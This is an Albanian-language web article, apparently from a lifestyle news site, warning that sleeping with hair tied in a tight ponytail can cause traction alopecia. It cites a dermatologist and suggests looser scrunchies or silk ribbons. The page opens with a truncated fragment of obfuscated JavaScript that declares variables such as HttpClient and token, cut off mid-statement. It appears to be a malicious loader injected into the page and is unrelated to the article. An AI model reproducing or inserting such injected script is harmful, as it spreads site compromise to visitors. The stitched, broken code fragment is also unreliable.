;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ja përse nuk duhet të flini me flokë të kapur bishtalec

By

Gjumi me flokët tuaj të kapur bishtalec mund të shkaktojë dëme.

Duke folur për Allure, Francesca J. Fusco, një dermatologe me qendër në New York City, e specializuar në humbjen e flokëve, tha: “Nëse dikush i kap flokët e tyre dhe i tërheq fort çdo natë për vite me radhë, alopecia tërheqëse mund të ndodhë përgjatë vijës së flokëve”.

Image result for sleeping with ponytail

Ndërsa termi alopecia i referohet humbjes së flokëve, Healthline raporton se alopecia tërheqëse ndodh kur një person humbet flokët për shkak të tërheqjes së flokëve në mënyrë të përsëritur. Tërheqja e flokëve duke i kapur ato bishtalec çdo natë mund të çojë në humbje të flokëve në planin afatgjatë.

Sigurohuni, edhe kur nuk jeni duke fjetur, të keni kujdes që të mos i kapni flokët fort.

Në thelb, nëse ju dhemb koka, ka të ngjarë të dëmtojë flokët tuaj mundohuni t’i kapni ato më lirshëm.

Nëse e urreni ndjenjën e flokëve tuaj në fytyrë kur jeni duke fjetur, ka mënyra që mund t’i mbani jashtë fytyrës dhe t’i mos dëmtoni ato. Janë të rekomanduara scrunchies më të lirshme të përshtatshme ose shirita mëndafshi.

Burimi: Insider.com

 

 

Artikuj të ngjashëm